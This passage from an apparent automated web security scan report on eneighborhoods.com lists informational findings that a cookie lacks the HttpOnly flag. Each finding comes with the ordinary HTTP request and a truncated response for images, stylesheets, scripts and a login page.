18.174. http://www.eneighborhoods.com/images/enterprise_solutions_menu_up.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/enterprise_solutions_menu_up.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/enterprise_solutions_menu_up.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 1499
Content-Type: image/jpeg
Last-Modified: Mon, 06 Oct 2008 15:50:39 GMT
Accept-Ranges: bytes
ETag: "39da2848cb27c91:660"
Date: Fri, 06 May 2011 18:40:31 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....`.`.....C....................................................................C...........................................................................................................
...[SNIP]...
18.175. http://www.eneighborhoods.com/images/footer_menu_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/footer_menu_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/footer_menu_bg.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 310
Content-Type: image/jpeg
Last-Modified: Mon, 06 Oct 2008 16:08:21 GMT
Accept-Ranges: bytes
ETag: "3de3b0c0cd27c91:660"
Date: Fri, 06 May 2011 18:40:34 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....`.`.....C....................................................................C..........................................................................................................

...[SNIP]...
18.176. http://www.eneighborhoods.com/images/free_resources_menu_over.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/free_resources_menu_over.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/free_resources_menu_over.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 1327
Content-Type: image/jpeg
Last-Modified: Mon, 06 Oct 2008 15:51:39 GMT
Accept-Ranges: bytes
ETag: "d9e39f6bcb27c91:660"
Date: Fri, 06 May 2011 18:40:32 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....`.`.....C....................................................................C.........................................................................x.................................
...[SNIP]...
18.177. http://www.eneighborhoods.com/images/free_resources_menu_up.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/free_resources_menu_up.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/free_resources_menu_up.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 1254
Content-Type: image/jpeg
Last-Modified: Mon, 06 Oct 2008 15:51:26 GMT
Accept-Ranges: bytes
ETag: "24c4864cb27c91:660"
Date: Fri, 06 May 2011 18:40:32 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....`.`.....C....................................................................C.........................................................................x.................................
...[SNIP]...
18.178. http://www.eneighborhoods.com/images/getstarted_button.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/getstarted_button.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/getstarted_button.gif HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 2499
Content-Type: image/gif
Last-Modified: Tue, 18 Nov 2008 21:48:37 GMT
Accept-Ranges: bytes
ETag: "34f0c269c749c91:660"
Date: Fri, 06 May 2011 18:40:27 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

GIF89a.......d*........t
.h..._...}D!.........gA.\..+.....)..v.i".P.....|...Q.[...7.....0.vZ.......i...~.V..J......+.W(.o...J..........{..m...V.?.n
.........y6..0..8.[.../.....w..;.c'.x.{9.....P2.
...[SNIP]...
18.179. http://www.eneighborhoods.com/images/header_bckgd.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/header_bckgd.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/header_bckgd.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 364
Content-Type: image/jpeg
Last-Modified: Fri, 22 Aug 2008 07:08:56 GMT
Accept-Ranges: bytes
ETag: "034faf0254c91:660"
Date: Fri, 06 May 2011 18:40:25 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....H.H.....C...........    ...    .......

.

........................... ...C.............. ......Q.    .................................
...[SNIP]...
18.180. http://www.eneighborhoods.com/images/home_image.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/home_image.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/home_image.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 87108
Content-Type: image/jpeg
Last-Modified: Wed, 29 Oct 2008 18:05:39 GMT
Accept-Ranges: bytes
ETag: "26f838f3f039c91:660"
Date: Fri, 06 May 2011 18:40:29 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....`.`....2.http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46.272976, Sat Jan 27 20
...[SNIP]...
18.181. http://www.eneighborhoods.com/images/homes_logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/homes_logo.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homes_logo.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 29972
Content-Type: image/jpeg
Last-Modified: Thu, 02 Sep 2010 14:00:53 GMT
Accept-Ranges: bytes
ETag: "f8759341a74acb1:660"
Date: Fri, 06 May 2011 18:40:29 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....H.H.....'Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Macintosh.2010:09:02 09:54:45.......
...[SNIP]...
18.182. http://www.eneighborhoods.com/images/menu_bg_new.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/menu_bg_new.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menu_bg_new.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 395
Content-Type: image/jpeg
Last-Modified: Mon, 06 Oct 2008 15:59:00 GMT
Accept-Ranges: bytes
ETag: "9a5d6372cc27c91:660"
Date: Fri, 06 May 2011 18:40:27 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....`.`.....C....................................................................C...........................................................................................................
...[SNIP]...
18.183. http://www.eneighborhoods.com/images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/spacer.gif HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Tue, 26 Aug 2008 17:31:36 GMT
Accept-Ranges: bytes
ETag: "96f13097a17c91:660"
Date: Fri, 06 May 2011 18:40:27 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

GIF89a.............!.......,...........L
.;
18.184. http://www.eneighborhoods.com/images/support_training_menus_over.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/support_training_menus_over.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/support_training_menus_over.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 932
Content-Type: image/jpeg
Last-Modified: Mon, 06 Oct 2008 15:53:13 GMT
Accept-Ranges: bytes
ETag: "c99481a3cb27c91:660"
Date: Fri, 06 May 2011 18:40:34 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....`.`.....C....................................................................C.........................................................................F.................................
...[SNIP]...
18.185. http://www.eneighborhoods.com/images/support_training_menus_up.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/support_training_menus_up.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/support_training_menus_up.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 887
Content-Type: image/jpeg
Last-Modified: Mon, 06 Oct 2008 15:53:04 GMT
Accept-Ranges: bytes
ETag: "d4c08a9ecb27c91:660"
Date: Fri, 06 May 2011 18:40:34 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....`.`.....C....................................................................C.........................................................................F.................................
...[SNIP]...
18.186. http://www.eneighborhoods.com/images/webinar_link.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/webinar_link.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/webinar_link.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 75368
Content-Type: image/jpeg
Last-Modified: Fri, 29 Apr 2011 18:22:58 GMT
Accept-Ranges: bytes
ETag: "2e145e779a6cc1:660"
Date: Fri, 06 May 2011 18:40:27 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....H.H....!.Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Macintosh.2011:04:29 14:13:27.......
...[SNIP]...
18.187. http://www.eneighborhoods.com/login_form.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /login_form.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login_form.asp HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:40:39 GMT
Content-Length: 4661
Content-Type: text/html
Cache-control: private
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<!--Login Start-->
<script
...[SNIP]...
18.188. http://www.eneighborhoods.com/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main.css HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 1083
Content-Type: text/css
Last-Modified: Tue, 09 Dec 2008 20:47:45 GMT
Accept-Ranges: bytes
ETag: "c63641633f5ac91:660"
Date: Fri, 06 May 2011 18:40:25 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

.main_text_red {
color: # 009;
font-size: 9px;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
}

.main_text_red2 {
color: #f00;
font-size: 12px;
font-family:
...[SNIP]...
18.189. http://www.eneighborhoods.com/menu/homepage/menu.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /menu/homepage/menu.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /menu/homepage/menu.css HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 403 Forbidden
Content-Length: 210
Content-Type: text/html
Date: Fri, 06 May 2011 18:40:24 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

<html><head><title>Error</title></head><body><head><title>Application Pool Access Denied</title></head>
<body><h1>The specified request cannot be executed from current Application Pool</h1></body></bo
...[SNIP]...
18.190. http://www.eneighborhoods.com/menu/menu.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /menu/menu.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /menu/menu.css HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 403 Forbidden
Content-Length: 210
Content-Type: text/html
Date: Fri, 06 May 2011 18:40:24 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

<html><head><title>Error</title></head><body><head><title>Application Pool Access Denied</title></head>
<body><h1>The specified request cannot be executed from current Application Pool</h1></body></bo
...[SNIP]...
18.191. http://www.eneighborhoods.com/menu/mm_css_menu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /menu/mm_css_menu.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /menu/mm_css_menu.js HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 403 Forbidden
Content-Length: 210
Content-Type: text/html
Date: Fri, 06 May 2011 18:40:24 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

<html><head><title>Error</title></head><body><head><title>Application Pool Access Denied</title></head>
<body><h1>The specified request cannot be executed from current Application Pool</h1></body></bo
...[SNIP]...
18.192. http://www.eneighborhoods.com/menumachine/core/w3cdom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /menumachine/core/w3cdom.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /menumachine/core/w3cdom.js HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 14846
Content-Type: application/x-javascript
Last-Modified: Mon, 28 May 2007 01:33:43 GMT
Accept-Ranges: bytes
ETag: "80f5fa39c8a0c71:660"
Date: Fri, 06 May 2011 18:40:27 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

//MenuMachine 2 (v2.2.1) Copyright 2007 Big Bang Software All Rights Reserved
menuPackage.prototype.cF=function(){if(!this.fo){return 1;}var fo=this.fo;var frms=___frames;var f=frms[fo.fr].f,url=null;
...[SNIP]...
18.193. http://www.eneighborhoods.com/menumachine/eneighborhoodsfooter2/menuspecs.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /menumachine/eneighborhoodsfooter2/menuspecs.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /menumachine/eneighborhoodsfooter2/menuspecs.js HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 2837
Content-Type: application/x-javascript
Last-Modified: Tue, 01 Jun 2010 14:24:38 GMT
Accept-Ranges: bytes
ETag: "0d7802a961cb1:660"
Date: Fri, 06 May 2011 18:40:25 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

/*
MenuMachine 2 definition file - do not edit. http://menumachine.com
2.2.1 :: eNeighborhoodsFooter2
*/
var menuName="eneighborhoodsfooter2";
